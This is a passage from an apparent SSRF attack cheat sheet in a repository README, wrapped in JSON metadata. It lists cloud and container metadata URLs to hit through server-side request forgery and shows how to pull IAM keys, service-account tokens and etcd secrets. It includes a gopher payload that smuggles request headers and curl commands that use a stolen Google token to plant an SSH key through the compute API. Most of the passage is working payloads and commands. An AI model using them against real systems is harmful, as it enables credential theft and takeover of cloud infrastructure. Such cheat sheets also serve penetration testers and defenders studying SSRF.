`http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`\n\n### SSRF URL for AWS ECS\n\nIf you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.\n\n```powershell\ncurl http://169.254.170.2/v2/credentials/\u003cUUID\u003e\n```\n\nThis way you'll extract IAM keys of the attached role\n\n### SSRF URL for AWS Elastic Beanstalk\n\nWe retrieve the `accountId` and `region` from the 
API.\n\n```powershell\nhttp://169.254.169.254/latest/dynamic/instance-identity/document\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role\n```\n\nWe then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.\n\n```powershell\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role\n```\n\n![notsosecureblog-awskey](https://www.notsosecure.com/wp-content/uploads/2019/02/aws-cli.jpg)\n\nThen we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.\n\n\n### SSRF URL for AWS Lambda\n\nAWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.\n\n```powershell\nhttp://localhost:9001/2018-06-01/runtime/invocation/next\n$ curl \"http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next\"\n```\n\nDocs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next\n\n### SSRF URL for Google Cloud\n\n:warning: Google is shutting down support for usage of the **v1 metadata service** on January 15.\n\nRequires the header \"Metadata-Flavor: Google\" or \"X-Google-Metadata-Request: True\"\n\n```powershell\nhttp://169.254.169.254/computeMetadata/v1/\nhttp://metadata.google.internal/computeMetadata/v1/\nhttp://metadata/computeMetadata/v1/\nhttp://metadata.google.internal/computeMetadata/v1/instance/hostname\nhttp://metadata.google.internal/computeMetadata/v1/instance/id\nhttp://metadata.google.internal/computeMetadata/v1/project/project-id\n```\n\nGoogle allows recursive pulls\n\n```powershell\nhttp://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true\n```\n\nBeta does NOT require a header atm (thanks Mathias Karlsson 
@avlidienbrunn)\n\n```powershell\nhttp://metadata.google.internal/computeMetadata/v1beta1/\nhttp://metadata.google.internal/computeMetadata/v1beta1/?recursive=true\n```\n\nRequired headers can be set using a gopher SSRF with the following technique\n\n```powershell\ngopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a\n```\n\nInteresting files to pull out:\n\n- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`\n- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`\n- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`\n\n#### Add an SSH key\n\nExtract the token\n\n```powershell\nhttp://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json\n```\n\nCheck the scope of the token\n\n```powershell\n$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA  \n\n{ \n        \"issued_to\": \"101302079XXXXX\", \n        \"audience\": \"10130207XXXXX\", \n        \"scope\": \"https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring\", \n        \"expires_in\": 2443, \n        \"access_type\": \"offline\" \n}\n```\n\nNow push the SSH key.\n\n```powershell\ncurl -X POST \"https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata\" \n-H \"Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA\" \n-H \"Content-Type: application/json\" \n--data '{\"items\": [{\"key\": \"sshkeyname\", \"value\": \"sshkeyvalue\"}]}'\n```\n\n### SSRF URL for Digital Ocean\n\nDocumentation available at 
`https://developers.digitalocean.com/documentation/metadata/`\n\n```powershell\ncurl http://169.254.169.254/metadata/v1/id\nhttp://169.254.169.254/metadata/v1.json\nhttp://169.254.169.254/metadata/v1/ \nhttp://169.254.169.254/metadata/v1/id\nhttp://169.254.169.254/metadata/v1/user-data\nhttp://169.254.169.254/metadata/v1/hostname\nhttp://169.254.169.254/metadata/v1/region\nhttp://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address\n\nAll in one request:\ncurl http://169.254.169.254/metadata/v1.json | jq\n```\n\n### SSRF URL for Packetcloud\n\nDocumentation available at `https://metadata.packet.net/userdata`\n\n### SSRF URL for Azure\n\nLimited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`\n\n```powershell\nhttp://169.254.169.254/metadata/v1/maintenance\n```\n\nUpdate Apr 2017, Azure has more support; requires the header \"Metadata: true\" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`\n\n```powershell\nhttp://169.254.169.254/metadata/instance?api-version=2017-04-02\nhttp://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02\u0026format=text\n```\n\n### SSRF URL for OpenStack/RackSpace\n\n(header required? unknown)\n\n```powershell\nhttp://169.254.169.254/openstack\n```\n\n### SSRF URL for HP Helion\n\n(header required? 
unknown)\n\n```powershell\nhttp://169.254.169.254/2009-04-04/meta-data/ \n```\n\n### SSRF URL for Oracle Cloud\n\n```powershell\nhttp://192.0.0.192/latest/\nhttp://192.0.0.192/latest/user-data/\nhttp://192.0.0.192/latest/meta-data/\nhttp://192.0.0.192/latest/attributes/\n```\n\n### SSRF URL for Alibaba\n\n```powershell\nhttp://100.100.100.200/latest/meta-data/\nhttp://100.100.100.200/latest/meta-data/instance-id\nhttp://100.100.100.200/latest/meta-data/image-id\n```\n\n### SSRF URL for Kubernetes ETCD\n\nCan contain API keys and internal ip and ports\n\n```powershell\ncurl -L http://127.0.0.1:2379/version\ncurl http://127.0.0.1:2379/v2/keys/?recursive=true\n```\n\n### SSRF URL for Docker\n\n```powershell\nhttp://127.0.0.1:2375/v1.24/containers/json\n\nSimple example\ndocker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash\nbash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json\nbash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json\n```\n\nMore info:\n\n- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option\n- Docker Engine API: https://docs.docker.com/engine/api/latest/\n\n### SSRF URL for Rancher\n\n```powershell\ncurl http://rancher-metadata/\u003cversion\u003e/\u003cpath\u003e\n```\n\nMore info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/\n\n\n## References\n\n- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)\n- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)\n- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus\n- [SSRF and local file read in video to gif 
converter](https://hackerone.com/reports/115857)\n- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)\n- [SSRF in proxy.duckduckgo.com](https://hackerone.com/reports/358119)\n- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)\n- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)\n- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)\n- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)\n- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)\n- [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)\n- [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)\n- [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)\n- [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)\n- [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)\n- [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)\n- [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)\n- [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)\n- [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)\n- [Hacker101 
SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)\n- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)\n- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)\n- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)\n- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)\n- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)\n- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)\n- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)\n- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)\n- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)\n- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-ssrf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpaulveillard%2Fcybersecurity-ssrf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-ssrf/lists"}